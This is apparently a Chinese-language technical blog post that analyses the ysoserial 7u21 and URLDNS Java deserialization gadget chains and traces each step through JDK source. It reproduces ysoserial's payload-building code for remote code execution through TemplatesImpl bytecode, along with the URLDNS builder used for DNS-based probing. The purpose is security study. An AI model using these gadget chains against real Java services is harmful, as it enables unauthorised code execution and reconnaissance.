ysoserial分析【二】7u21和URLDNS

  • 2020 年 3 月 30 日
  • 筆記

7u21

7u21中利用了TemplatesImpl来执行命令,结合动态代理、AnnotationInvocationHandler、HashSet都成了gadget链。

先看一下调用栈,把ysoserial中的调用栈简化了一下

LinkedHashSet.readObject()    LinkedHashSet.add()        Proxy(Templates).equals()          AnnotationInvocationHandler.invoke()            AnnotationInvocationHandler.equalsImpl()              Method.invoke()                ...                  TemplatesImpl.getOutputProperties()                    TemplatesImpl.newTransformer()                      TemplatesImpl.getTransletInstance()                        TemplatesImpl.defineTransletClasses()                          对_bytecodes属性的值(实例的字节码)进行实例化                            RCE  

其中关于TemplatsImpl类如何执行恶意代码的知识可以参考另一篇文章中对CommonsCollections2的分析,这里不再赘述。只要知道这里调用TemplatesImpl.getOutputProperties()可以执行恶意代码即可。

看一下ysoserial的poc

    public Object getObject(final String command) throws Exception {      final Object templates = Gadgets.createTemplatesImpl(command);//返回构造好的TemplatesImpl实例,实例的_bytecodes属性的值是执行恶意语句类的字节码        String zeroHashCodeStr = "f5a5a608";      HashMap map = new HashMap();      map.put(zeroHashCodeStr, "foo");        InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor("sun.reflect.annotation.AnnotationInvocationHandler").newInstance(Override.class, map);//map作为构造方法的第二个参数,map赋值给AnnotationInvocationHandler.membervalues属性        Reflections.setFieldValue(tempHandler, "type", Templates.class);      Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);//为AIH创建代理        LinkedHashSet set = new LinkedHashSet(); //LinkedHashSet父类是HashSet      set.add(templates);//TemplatesImpl实例      set.add(proxy);//AnnotationInvocationHandler实例的代理,AnnotationInvocationHandler的membervalues是TemplatesImple实例        Reflections.setFieldValue(templates, "_auxClasses", null);      Reflections.setFieldValue(templates, "_class", null);        map.put(zeroHashCodeStr, templates); //绑定到AnnotationInvocationHandler的那个map中的再添加一组键值对,value是TemplatesImpl实例。但是由于map中的第一组键值对的键也是zeroHashCodeStr,因此这里就是相当于把第一个键值对的value重新复赋值了。        return set;//返回LinkedHashSet实例,用于序列化  }  

总体来说就是返回一个LinkedHashSet实例,其中有两个元素,第一个元素是_bytecodes属性是恶意类字节码的TemplatesImpl实例。

第二个元素是AnnotationInvocationHandler的代理实例,这个AnnotationInvocationHandler实例在初始化时将一个HashMap实例传入,HashMap的第一个元素的key是TemplatesImpl实例。

看一下AnnotationInvocationHandler的构造方法

AnnotationInvocationHandler(Class<? extends Annotation> var1, Map<String, Object> var2) {      this.type = var1;      this.memberValues = var2;  }  

也就是把这个HashMap实例赋值给了memberValues属性。

至此poc分析完毕,下面调试一下反序列化触发gadget链的流程。有感到模糊的地方可以参考以上的分析。

gadget链分析

首先由于poc return了LinkedHashSet实例用于序列化,因此这就是反序列化的入口。由于LinkedHashSet没有实现readObject()方法,因此跟进其父类:HashSet.readObject

private void readObject(java.io.ObjectInputStream s)      throws java.io.IOException, ClassNotFoundException {        s.defaultReadObject();        int capacity = s.readInt();      float loadFactor = s.readFloat();      map = (((HashSet)this) instanceof LinkedHashSet ?             new LinkedHashMap<E,Object>(capacity, loadFactor) :             new HashMap<E,Object>(capacity, loadFactor));//创建一个新map        // Read in size      int size = s.readInt();        // Read in all elements in the proper order.      for (int i=0; i<size; i++) {          E e = (E) s.readObject();          map.put(e, PRESENT);//将反序列化出来的元素put到map中      }  }  

我们主要关注其对元素的操作。可以看到最后的一个for循环,变量e就是每个元素反序列化之后的实例。由于在构建poc时,LinkedHashSet被我们添加了两个元素,因此这里会进行两次for循环,第一次e是TemplatsImpl实例,第二次是Proxy实例

这里把两个元素反序列化之后会作为第一个参数调用map.put(),跟进一下这个方法

public V put(K key, V value) {      if (key == null)          return putForNullKey(value);      int hash = hash(key);      int i = indexFor(hash, table.length);      for (Entry<K,V> e = table[i]; e != null; e = e.next) {          Object k;          if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {              V oldValue = e.value;              e.value = value;              e.recordAccess(this);              return oldValue;          }      }        modCount++;      addEntry(hash, key, value, i);      return null;  }  

我们主要关注这里对第一个参数key的操作,因为我们的payload就在TemplatsImple和Proxy实例中,因此只有对key做某些操作才可能会触发我们的payload。

可以看到首先调用了hash(key),跟进一下HashMap.hash()

final int hash(Object k) {      ...        h ^= k.hashCode();        h ^= (h >>> 20) ^ (h >>> 12);      return h ^ (h >>> 7) ^ (h >>> 4);  }  

可以发现,这里调用了key的hashCode()方法。我们挨个看看两个key:TemplatesImpl和Proxy是如何调用hashCode()的。

由于TemplatesImpl并没有实现hashCode()方法,因此直接调用了基类Object.hashCode()。

public native int hashCode();  

这是个native方法,也就是java调用非java代码编写的接口,这个hashCode()大概是通过计算对象的内存地址得到的。下面再看Proxy.hashCode(),由于动态代理的特性,调用Proxy的所有方法都会转而调用绑定在Proxy上的InvocationHandler的Invoke()方法。回顾最上面创建Proxy时,我们绑定的InvocationHandler是AnnotationInvocationHandler实例,因此这里会转而调用AnnotationInvocationHandler.invoke(),跟进之后发现,最底层调用了AnnotationInvocationHandler.hashCodeImple()方法

private int hashCodeImpl() {      int var1 = 0;        Entry var3;      for(Iterator var2 = this.memberValues.entrySet().iterator(); var2.hasNext(); var1 += 127 * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())) {          var3 = (Entry)var2.next();      }        return var1;  }  

这里看的会比较绕,其实就是通过遍历this.memberValues.entrySet()中的所有键值对,来计算其中的key和value的hash,全部加起来之后返回最后的hash值。这里的this.memberValues属性就是我们在构建poc时传入的那个HashMap实例。

Proxy.hashCode()跟完了,没有什么危险操作。因此回到最开始的HashMap.put()中。

public V put(K key, V value) {      if (key == null)          return putForNullKey(value);      int hash = hash(key);      int i = indexFor(hash, table.length);      for (Entry<K,V> e = table[i]; e != null; e = e.next) {          Object k;          if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {              V oldValue = e.value;              e.value = value;              e.recordAccess(this);              return oldValue;          }      }        modCount++;      addEntry(hash, key, value, i);      return null;  }  

int hash = hash(key)这一步已经跟踪完了,继续往下看。可以看到for循环的条件是table[i] != null,这里的table在最后调用的addEntry()中进行了赋值,跟进一下

void addEntry(int hash, K key, V value, int bucketIndex) {      if ((size >= threshold) && (null != table[bucketIndex])) {          resize(2 * table.length);          hash = (null != key) ? hash(key) : 0;          bucketIndex = indexFor(hash, table.length);      }        createEntry(hash, key, value, bucketIndex);  }    void createEntry(int hash, K key, V value, int bucketIndex) {      Entry<K,V> e = table[bucketIndex];      table[bucketIndex] = new Entry<>(hash, key, value, e);      size++;  }  

可以发现,这里利用key、value和hash创建了一个Entry实例,然后添加到了table数组中。回到上面的put()方法,由于for循环处的table中没有数据,因此调用完addEntry()就直接return了。

接下来是第二次进入put()方法,这一次传入的k参数是Proxy实例。int hash = hash(key);我们已经跟进过了,仅需往下看,到了for循环。由于在上一次table中已经有了数据,因此这里会进入。然后就到了if条件

for (Entry<K,V> e = table[i]; e != null; e = e.next) {      Object k;      if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {          ...  

这里的变量e就是在上次添加到table数组中的那个Entry对象。e.hash就是初始化时传入的hash的值,同理e.key也是初始化时传入的key。如果这里满足e.hash == hashe.key != key时,就会调用key.equals(e.key)

这些条件后面会回过头来说,先假设这些条件都可以满足。就会导致调用key.equals(e.key),这里的keyProxy,而e.key是上一次的TemplatesImpl实例。又由于调用了Proxy的方法,自动跳转到AnnotationInvocationHandler.invoke()。跟进一下

public Object invoke(Object var1, Method var2, Object[] var3) {      String var4 = var2.getName();      Class[] var5 = var2.getParameterTypes();      if (var4.equals("equals") && var5.length == 1 && var5[0] == Object.class) {          return this.equalsImpl(var3[0]);      } else {          ...      }  }  

var1是代理类实例,var2是调用的方法,就是equals的Method对象,var3是调用的参数,也就是TemplatesImpl实例。注意上面的第一个if条件,equals方法的参数是Object类型,因此总体判定条件为True,从而以var3[0]为参数,调用this.equalsImpl(),跟进

private Boolean equalsImpl(Object var1) {      if (var1 == this) {          return true;      } else if (!this.type.isInstance(var1)) {          return false;      } else {          Method[] var2 = this.getMemberMethods();          int var3 = var2.length;            for(int var4 = 0; var4 < var3; ++var4) {              Method var5 = var2[var4];              String var6 = var5.getName();              Object var7 = this.memberValues.get(var6);              Object var8 = null;              AnnotationInvocationHandler var9 = this.asOneOfUs(var1);              if (var9 != null) {                  var8 = var9.memberValues.get(var6);              } else {                  try {                      var8 = var5.invoke(var1);                  } catch (InvocationTargetException var11) {                      return false;                  } catch (IllegalAccessException var12) {                      throw new AssertionError(var12);                  }              }                if (!memberValueEquals(var7, var8)) {                  return false;              }          }            return true;      }  }  

这里的var1就是TemplatesImpl实例,而this.type在创建poc时就已经定义了

Reflections.setFieldValue(tempHandler, "type", Templates.class);  

TemplatesImpl的正是实现了Templates接口,因此if条件中的this.type.isInstance(var1)是True,非True就是False,因此进入Else语句。首先调用了this.getMemberMethods(),跟进一下

private Method[] getMemberMethods() {      if (this.memberMethods == null) {          this.memberMethods = (Method[])AccessController.doPrivileged(new PrivilegedAction<Method[]>() {              public Method[] run() {                  Method[] var1 = AnnotationInvocationHandler.this.type.getDeclaredMethods();//利用反射获取this.type类/接口中声明的所有方法                  AccessibleObject.setAccessible(var1, true);                  return var1;              }          });      }        return this.memberMethods;  }  

由于this.type是Templates接口,因此看一下这个接口声明了哪些方法。

public interface Templates {        Transformer newTransformer() throws TransformerConfigurationException;        Properties getOutputProperties();  }  

只声明了两个方法:newTransformer()和getOutputProperties()。

回到equalsImpl(),获取了this.type中声明的方法之后返回给变量var2。然后进入一个for循环,对这些方法进行遍历。先把方法名赋值给var6,跟进this.asOneOfUs()

private AnnotationInvocationHandler asOneOfUs(Object var1) {      if (Proxy.isProxyClass(var1.getClass())) {          ...      }        return null;  }  

由于var1是TemplatesImpl实例,并不是Proxy,因此直接return null。回到上面,由于var9是null,因此进入else语句

var8 = var5.invoke(var1);  

var5是上面返回的两个方法的其中一个,也就是newTransformer()和getOutputProperties(),var1是TemplatesImpl实例。这里通过反射调用TemplatesImpl的var5方法。

本文一开始就说了,调用TemplatesImpl.getOutputProperties()会导致TemplatesImpl._bytecodes的值(含有执行恶意代码的类的字节码)进行实例化,因此这里就是漏洞的触发点了。

hashCode绕过

至此漏洞已经成功触发,回到之前还有一个没有完成的点,也就是HashMap.put()方法中的那个if条件。

public V put(K key, V value) {      ...      int hash = hash(key);      int i = indexFor(hash, table.length);      for (Entry<K,V> e = table[i]; e != null; e = e.next) {          Object k;          if (e.hash == hash && ((k = e.key) == key || key.equals(k))) {              ...  }  

也就是这里的e.hash == hashe.key != key。由于key是Proxy实例,e.key是TemplatesImpl实例,因此第二个条件好满足,注意是第一个条件,如何保证两者的hash相同?

e.hash是由TemplatesImpl.hashCode(),由于TemplatesImpl没有定义这个方法,因此调用的是Object的方法,而正如之前说的,Object.hashCode()是通过对象的内存地址来计算hash的。

hash变量是Proxy.hashCode()返回的,也就是之前分析的AnnotationInvocationHandler.hashCodeImple(),回顾一下

private int hashCodeImpl() {      int var1 = 0;        Entry var3;      for(Iterator var2 = this.memberValues.entrySet().iterator(); var2.hasNext(); var1 += 127 * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())) {          var3 = (Entry)var2.next();      }        return var1;  }  

这里的this.memberValues属性就是我们在构建poc时传入的那个HashMap实例,也就是(new HashMap()).put("f5a5a608", templates),templates是TemplatesImpl实例。上面的hashCodeImple()主要是这句:

private int hashCodeImpl() {      ...          var1 += 127 * ((String)var3.getKey()).hashCode() ^ memberValueHashCode(var3.getValue())      ...      return var1;  }  

而key是"f5a5a608",value是TempIatesImpl实例,因此等价于

127 * "f5a5a608".hashCode() ^ memberValueHashCode(teamplates)  

跟进一下memberValueHashCode

    private static int memberValueHashCode(Object var0) {          Class var1 = var0.getClass();          if (!var1.isArray()) {              return var0.hashCode();              ...  

由于参数是TemplatesImpl对象,因此直接返回了TemplatesImpl.hashCode(),前面已经说了,其TemplatesImpl并没有重写hashCode,因此调用Object.hashCode()根据对象的内存地址生成了hash。至此两个hash的值已经计算完了。

第一个hash:  TemplatesImpl实例.hashCode()    第二个hash  127 * "f5a5a608".hashCode() ^ TemplatesImpl实例.hashCode()  

这两个TemplatesImpl实例的内存地址实际上是一样的,因为在构建poc时,用的就是同一个TemplatesImpl实例:

public Object getObject(final String command) throws Exception {      final Object templates = Gadgets.createTemplatesImpl(command);//TemplatesImpl实例        String zeroHashCodeStr = "f5a5a608";        HashMap map = new HashMap();      map.put(zeroHashCodeStr, "foo");      ...        LinkedHashSet set = new LinkedHashSet();      set.add(templates);//插入TemplatesImpl实例      set.add(proxy);//Proxy代理        ...        map.put(zeroHashCodeStr, templates);//插入TemplatesImpl实例        return set;  }  

由于是同一个实例,因此内存地址相同,因此Object.hashCode()返回的hash也是相同的。回看一下两个hash

第一个hash:  TemplatesImpl实例.hashCode()    第二个hash  127 * "f5a5a608".hashCode() ^ TemplatesImpl实例.hashCode()  

我们只需要计算一下"f5a5a608".hashCode(),这也是一个比较有意思的点,直接放到Debug中计算一下

结果是0!这个值好像是一哥们通过一个while循环遍历出来的。因此上面的第二个hash由于是127 * 0,因此也是0,从而两个hash变成了:

第一个hash:  TemplatesImpl实例.hashCode()    第二个hash  0 ^ TemplatesImpl实例.hashCode()  

^是异或运算符,异或的规则是转换成二进制比较,相同为0,不同为1。由于是按二进制的位进行比较,0只有一位,也就是说如果一个数的最低位与0相同,那一位则为0,否则则为1,这个结果正好与条件一样,只有最低位是0时才会与0相同,从而返回0。如果最低位是1,与0不同,则返回1,也就是啥都没变呗。所以说任何数与0异或,结果都还是原来的值,因此上面这两个hash相等了。

至此几个条件全部满足,通过后面的key.equals(k)造成了代码执行。

因此整个的数据流大概是

HashSet.readObject()      HashMap.put()          TemplatesImpl.hashCode()      HashMap.put()          Proxy.hashCode()              AnnotationInvocationHandler.Invoke()                  AnnotationInvocationHandler.hashCodeImpl()          Proxy.equals()              AnnotationInvocationHandler.Invoke()                  AnnotationInvocationHandler.equalsImpl()                      TemplatesImpl.getOutputProperties()                          TemplatesImpl.newTransformer()                              TemplatesImpl.getTransletInstance()                                  TemplatesImpl.defineTransletClasses()                                      对_bytecodes属性的值(实例的字节码)进行实例化                                          RCE  

参考

JDK7u21反序列化漏洞分析
ysoserial payload分析

URLDNS

这个gadget会在反序列化时发送一个DNS请求,仅依赖于JDK,因此适用范围很广,应该是只要有反序列化入口就能用这个gadget打。

先看一下调用栈

Gadget Chain:    HashMap.readObject()      HashMap.putVal()        HashMap.hash()          URL.hashCode()  

这里就涉及到了URL类,这个类的hashCode()方法底层会调用URLStreamHandler.hashCode()发送一个DNS请求。

protected int hashCode(URL u) {      int h = 0;        // Generate the protocol part.      String protocol = u.getProtocol();      if (protocol != null)          h += protocol.hashCode();        // Generate the host part.      InetAddress addr = getHostAddress(u);        ...  

在反序列化时,HashMap会自动对键计算hash,其中就调用了键的hashCode()方法,因此我们可以利用HashMap来触发URL.hashCode()

private void readObject(java.io.ObjectInputStream s)      throws IOException, ClassNotFoundException {      // Read in the threshold (ignored), loadfactor, and any hidden stuff      s.defaultReadObject();      reinitialize();      if (loadFactor <= 0 || Float.isNaN(loadFactor))          throw new InvalidObjectException("Illegal load factor: " +                                           loadFactor);      s.readInt();                // Read and ignore number of buckets      int mappings = s.readInt(); // Read number of mappings (size)      if (mappings < 0)          throw new InvalidObjectException("Illegal mappings count: " +                                           mappings);      else if (mappings > 0) { // (if zero, use defaults)            ...          Node<K,V>[] tab = (Node<K,V>[])new Node[cap];          table = tab;            // Read the keys and values, and put the mappings in the HashMap          for (int i = 0; i < mappings; i++) {              @SuppressWarnings("unchecked")                  K key = (K) s.readObject();              @SuppressWarnings("unchecked")                  V value = (V) s.readObject();              putVal(hash(key), key, value, false, false);//          }      }  }    static final int hash(Object key) {      int h;      return (key == null) ? 0 : (h = key.hashCode()) ^ (h >>> 16);  }  

根据以上描述大概可以写出这样的poc

URLStreamHandler handler = new SilentURLStreamHandler();    HashMap ht = new HashMap();  URL u = new URL(null, url, handler);  ht.put(u, url);    return ht;    static class SilentURLStreamHandler extends URLStreamHandler {            protected URLConnection openConnection(URL u) throws IOException {                  return null;          }          protected synchronized InetAddress getHostAddress(URL u) {                  return null;          }  }  

这里的SilentURLStreamHandler类重写了URLStreamHandler.getHostAddress(),这样可以保证在编译gadget时不会发送DNS请求。

然后我们把上面poc返回的类进行序列化,在反序列化并没有发送DNS请求。调试之后才发现,在反序列化调用URL.hashCode()由于已经存在hashCode且值不为-1,从而直接return掉了。

因此我们需要保证URL.hashCode的值为null或-1。我们可以在序列化时利用反射来修改URL的属性,如下

URL u = new URL(null, url, handler);  ht.put(u, url);  Reflections.setFieldValue(u, "hashCode", -1);  

调用链如下

HashMap.readObject() -> HashMap.hash() -> URL.hashCode() -> URLStreamHandler.hashCode() -> URLStreamHandler.getHostAddress()